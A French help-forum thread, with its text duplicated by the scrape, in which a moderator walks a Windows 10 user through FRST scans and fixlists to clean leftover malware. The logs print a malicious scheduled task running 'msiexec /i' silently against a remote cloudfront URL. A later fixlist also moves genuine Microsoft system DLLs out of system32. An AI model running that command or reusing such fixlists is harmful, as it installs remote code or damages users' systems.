Fenêtre DOS qui s'ouvre et qui se referme au démarrage
Résolu
Pakikeuss
Messages postés
12
Date d'inscription
Statut
Membre
Dernière intervention
-
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour, Bonsoir,
J'ai un petit problème à chaque démarrage de mon ordinateur une fenêtre DOS s'ouvre et se referme instantanément.
Je suis sous Windows 10.
J'ai déjà effectué une analyse ZHPClean, MalwareBytes, et utilisé la version d'essai Kaspersky pour corriger le problème sans succès.
En vous remerciant par avance,
Paki.
J'ai un petit problème à chaque démarrage de mon ordinateur une fenêtre DOS s'ouvre et se referme instantanément.
Je suis sous Windows 10.
J'ai déjà effectué une analyse ZHPClean, MalwareBytes, et utilisé la version d'essai Kaspersky pour corriger le problème sans succès.
En vous remerciant par avance,
Paki.
A voir également:
- Winio64.sys
- Fenetre windows - Guide
- Fenêtre hors écran windows 11 - Guide
- Mcafee fenetre intempestive - Accueil - Piratage
- Fenetre de navigation privée - Guide
- Position adresse enveloppe fenêtre a4 word ✓ - Forum Word
5 réponses
Dans ce cas il faut suivre ce tuto : https://www.malekal.com/comment-trouver-source-ouvertures-cmd-exe/
Pour trouver la source des commandes cmd.
Faut laisser tourner le programme qui enregistre l'activité système jusqu'à ce qu'une fenêtre cmd et déterminer la source.
Si tu n'arrives pas à t'en sortir pour trouver la source.
Enregistre le contenu par le menu File / Save.
Et tu partages le fichier via un hébergeur.
Eventuellement :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Pour trouver la source des commandes cmd.
Faut laisser tourner le programme qui enregistre l'activité système jusqu'à ce qu'une fenêtre cmd et déterminer la source.
Si tu n'arrives pas à t'en sortir pour trouver la source.
Enregistre le contenu par le menu File / Save.
Et tu partages le fichier via un hébergeur.
Eventuellement :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Bonjour,
merci pour commencer pour avoir répondu,
étant donné que la fenêtre DOS ne s'ouvre qu'au démarrage je pense que la première méthode ne fonctionnera pas.
Aussi, voici les rapports de la deuxième méthode :
Addition :
https://pjjoint.malekal.com/files.php?id=20170522_d6w11v10b9l7
FRST :
https://pjjoint.malekal.com/files.php?id=FRST_20170522_h7h13m9x5i13
Shortcut :
https://pjjoint.malekal.com/files.php?id=20170522_q8h10f13y5d14
En vous remerciant par avance,
merci pour commencer pour avoir répondu,
étant donné que la fenêtre DOS ne s'ouvre qu'au démarrage je pense que la première méthode ne fonctionnera pas.
Aussi, voici les rapports de la deuxième méthode :
Addition :
https://pjjoint.malekal.com/files.php?id=20170522_d6w11v10b9l7
FRST :
https://pjjoint.malekal.com/files.php?id=FRST_20170522_h7h13m9x5i13
Shortcut :
https://pjjoint.malekal.com/files.php?id=20170522_q8h10f13y5d14
En vous remerciant par avance,
si la procédure est à suivre, même si ce n'est pas au démarrage.
de toue façon, y a des restes d'infection, FRST devrait vider la liste d'attente BITS.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
Veuillez appuyer sur une touche pour continuer la désinfection...
de toue façon, y a des restes d'infection, FRST devrait vider la liste d'attente BITS.
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Chromium] => c:\users\bilal\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26888400 2016-06-15] (Microsoft Corporation)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [9CYN1PY8WAS3CDY] => "C:\Program Files (x86)\rbrwl0no0pg\IULW3.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [CDUWOLOHGW0LTBK] => "C:\Program Files\S1C0IIMZUH\S1C0IIMZU.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [GHMKZEL5OM4KXJQ] => "C:\Program Files\HP7G8YAJGD\HP7G8YAJG.exe"
CHR Extension: (Norton Security Toolbar) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-06-21]
CHR Extension: (Norton Identity Safe) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-06-21]
2017-05-21 19:18 - 2017-05-21 19:18 - 00454440 _____ C:\WINDOWS\SysWOW64\Auhardwaregl.dll
2017-05-21 19:18 - 2017-05-21 19:18 - 00196640 _____ C:\WINDOWS\system32\Drivers\Uefochubsrv.sys
2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe
Task: {11EEA855-F358-4CF4-BA6C-90D9A8260C57} - System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => C:\Users\bilal\AppData\Local\663107~1\UPDATE~1.EXE <==== ATTENTION
Task: {8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR100Y6P3JYVRM3JYVRMX&d=20170521 /q <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
Veuillez appuyer sur une touche pour continuer la désinfection...
Voici le contenu du rapport :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-05-2017
Exécuté par bilal (22-05-2017 15:37:32) Run:1
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Chromium] => c:\users\bilal\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26888400 2016-06-15] (Microsoft Corporation)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [9CYN1PY8WAS3CDY] => "C:\Program Files (x86)\rbrwl0no0pg\IULW3.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [CDUWOLOHGW0LTBK] => "C:\Program Files\S1C0IIMZUH\S1C0IIMZU.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [GHMKZEL5OM4KXJQ] => "C:\Program Files\HP7G8YAJGD\HP7G8YAJG.exe"
CHR Extension: (Norton Security Toolbar) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-06-21]
CHR Extension: (Norton Identity Safe) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-06-21]
2017-05-21 19:18 - 2017-05-21 19:18 - 00454440 _____ C:\WINDOWS\SysWOW64\Auhardwaregl.dll
2017-05-21 19:18 - 2017-05-21 19:18 - 00196640 _____ C:\WINDOWS\system32\Drivers\Uefochubsrv.sys
2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe
Task: {11EEA855-F358-4CF4-BA6C-90D9A8260C57} - System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => C:\Users\bilal\AppData\Local\663107~1\UPDATE~1.EXE <==== ATTENTION
Task: {8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR100Y6P3JYVRM3JYVRMX&d=20170521 /q <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Lync => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\9CYN1PY8WAS3CDY => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CDUWOLOHGW0LTBK => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GHMKZEL5OM4KXJQ => valeur supprimé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => déplacé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Auhardwaregl.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\Uefochubsrv.sys => déplacé(es) avec succès
C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{66310752-3AB0-63C8-96E8-53E86728FC0D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Jernearaloied => clé supprimé(es) avec succès
Impossible de déplacer "C:\Windows\System32\Drivers\etc\hosts" => Planifié pour déplacement au redémarrage.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 55956324 B
Java, Flash, Steam htmlcache => 26696 B
Windows/system/drivers => 17577444 B
Edge => 4152537 B
Chrome => 733746 B
Firefox => 13953314 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 28010 B
NetworkService => 1074912 B
bilal => 1043214474 B
RecycleBin => 131888299 B
EmptyTemp: => 1.2 GB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 22-05-2017 15:40:14)
C:\Windows\System32\Drivers\etc\hosts => a été déplacé(e) avec succès
Impossible de restaurer Hosts.
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-05-2017
Exécuté par bilal (22-05-2017 15:37:32) Run:1
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Chromium] => c:\users\bilal\appdata\local\chromium\application\chrome.exe [1068544 2016-03-18] (The Chromium Authors)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\Office16\lync.exe [26888400 2016-06-15] (Microsoft Corporation)
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [9CYN1PY8WAS3CDY] => "C:\Program Files (x86)\rbrwl0no0pg\IULW3.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [CDUWOLOHGW0LTBK] => "C:\Program Files\S1C0IIMZUH\S1C0IIMZU.exe"
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\...\Run: [GHMKZEL5OM4KXJQ] => "C:\Program Files\HP7G8YAJGD\HP7G8YAJG.exe"
CHR Extension: (Norton Security Toolbar) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-06-21]
CHR Extension: (Norton Identity Safe) - C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif [2016-06-21]
2017-05-21 19:18 - 2017-05-21 19:18 - 00454440 _____ C:\WINDOWS\SysWOW64\Auhardwaregl.dll
2017-05-21 19:18 - 2017-05-21 19:18 - 00196640 _____ C:\WINDOWS\system32\Drivers\Uefochubsrv.sys
2017-05-19 15:16 - 2017-05-19 15:16 - 01183744 _____ C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe
Task: {11EEA855-F358-4CF4-BA6C-90D9A8260C57} - System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => C:\Users\bilal\AppData\Local\663107~1\UPDATE~1.EXE <==== ATTENTION
Task: {8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=HGSTXHTS721010A9E630_JR100Y6P3JYVRM3JYVRMX&d=20170521 /q <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Lync => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\9CYN1PY8WAS3CDY => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CDUWOLOHGW0LTBK => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\Software\Microsoft\Windows\CurrentVersion\Run\\GHMKZEL5OM4KXJQ => valeur supprimé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => déplacé(es) avec succès
C:\Users\bilal\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\iikflkcanblccfahdhdonehdalibjnif => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Auhardwaregl.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Drivers\Uefochubsrv.sys => déplacé(es) avec succès
C:\WINDOWS\cc2fb0c6b92fa47c09bef299938689fe.exe => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11EEA855-F358-4CF4-BA6C-90D9A8260C57} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{66310752-3AB0-63C8-96E8-53E86728FC0D} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{66310752-3AB0-63C8-96E8-53E86728FC0D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CBB0A83-98B4-45E3-8FC8-282C13ED64F3} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Microsoft\Windows\DeviceSettings\Jernearaloied => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Jernearaloied => clé supprimé(es) avec succès
Impossible de déplacer "C:\Windows\System32\Drivers\etc\hosts" => Planifié pour déplacement au redémarrage.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 55956324 B
Java, Flash, Steam htmlcache => 26696 B
Windows/system/drivers => 17577444 B
Edge => 4152537 B
Chrome => 733746 B
Firefox => 13953314 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 28010 B
NetworkService => 1074912 B
bilal => 1043214474 B
RecycleBin => 131888299 B
EmptyTemp: => 1.2 GB données temporaires supprimées.
================================
Résultats du déplacement planifié des fichiers (Mode d'amorçage: Normal) (Date&Heure: 22-05-2017 15:40:14)
C:\Windows\System32\Drivers\etc\hosts => a été déplacé(e) avec succès
Impossible de restaurer Hosts.
Fin de Fixlog 15:40:14
Bon alors accrochez-vous voici ce que j'ai fait :
J'ai lancé le logiciel Procmon afin de détecter la fameuse anomalie mais j'ai rien trouvé à part qu'un logiciel "Dragon msi center" essayait de se lancer à chaque session..
J'ai donc lancé ce logiciel à part et il ne fonctionnait pas! Du coup je suis aller le désinstaller sur le panneau de configuration... Mais rien ! impossible de le désinstaller il y a une erreur : "1628 : Failed to compile installation"
J'ai ensuite trouvé sur internet que pour résoudre cette erreur une des solution consistait à renommer le fichier InstallShield se trouvant dans Programmefiles(x86)/CommonFiles/InstallShield
Sauf que je ne l'ai pas, en fait plusieurs logiciels malveillants ont été désinstallés il n'y a pas longtemps et j'ai du supprimer le fichier avec... quelle stupidité!
Je ne trouve pas de moyen pour le réinstaller !
J'ai lancé le logiciel Procmon afin de détecter la fameuse anomalie mais j'ai rien trouvé à part qu'un logiciel "Dragon msi center" essayait de se lancer à chaque session..
J'ai donc lancé ce logiciel à part et il ne fonctionnait pas! Du coup je suis aller le désinstaller sur le panneau de configuration... Mais rien ! impossible de le désinstaller il y a une erreur : "1628 : Failed to compile installation"
J'ai ensuite trouvé sur internet que pour résoudre cette erreur une des solution consistait à renommer le fichier InstallShield se trouvant dans Programmefiles(x86)/CommonFiles/InstallShield
Sauf que je ne l'ai pas, en fait plusieurs logiciels malveillants ont été désinstallés il n'y a pas longtemps et j'ai du supprimer le fichier avec... quelle stupidité!
Je ne trouve pas de moyen pour le réinstaller !
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
R3 WINIO; C:\Program Files (x86)\MSI\Dragon Gaming Center\winio64.sys [15160 2010-06-07] ()
2017-05-20 16:18 - 2017-05-20 16:18 - 00000000 ____D C:\ProgramData\Gaming Center
C:\Program Files (x86)\MSI\Dragon Gaming Center
2017-05-11 13:21 - 2017-04-28 02:16 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-05-11 13:21 - 2017-04-28 02:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:20 - 2017-04-28 01:59 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:18 - 2017-04-28 01:58 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie
Bonjour,
Voici le contenu du fichier texte :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 24-05-2017
Exécuté par bilal (26-05-2017 16:06:28) Run:2
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
R3 WINIO; C:\Program Files (x86)\MSI\Dragon Gaming Center\winio64.sys [15160 2010-06-07] ()
2017-05-20 16:18 - 2017-05-20 16:18 - 00000000 ____D C:\ProgramData\Gaming Center
C:\Program Files (x86)\MSI\Dragon Gaming Center
2017-05-11 13:21 - 2017-04-28 02:16 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-05-11 13:21 - 2017-04-28 02:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:20 - 2017-04-28 01:59 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:18 - 2017-04-28 01:58 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
WINIO => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WINIO => clé supprimé(es) avec succès
WINIO => service supprimé(es) avec succès
C:\ProgramData\Gaming Center => déplacé(es) avec succès
C:\Program Files (x86)\MSI\Dragon Gaming Center => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Windows.Gaming.Input.dll => déplacé(es) avec succès
Impossible de restaurer Hosts.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 25941675 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 2994199 B
Edge => 13824 B
Chrome => 0 B
Firefox => 378998108 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 2474 B
NetworkService => 0 B
bilal => 323538776 B
RecycleBin => 10407085 B
EmptyTemp: => 707.6 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Voici le contenu du fichier texte :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 24-05-2017
Exécuté par bilal (26-05-2017 16:06:28) Run:2
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
R3 WINIO; C:\Program Files (x86)\MSI\Dragon Gaming Center\winio64.sys [15160 2010-06-07] ()
2017-05-20 16:18 - 2017-05-20 16:18 - 00000000 ____D C:\ProgramData\Gaming Center
C:\Program Files (x86)\MSI\Dragon Gaming Center
2017-05-11 13:21 - 2017-04-28 02:16 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-05-11 13:21 - 2017-04-28 02:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:20 - 2017-04-28 01:59 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
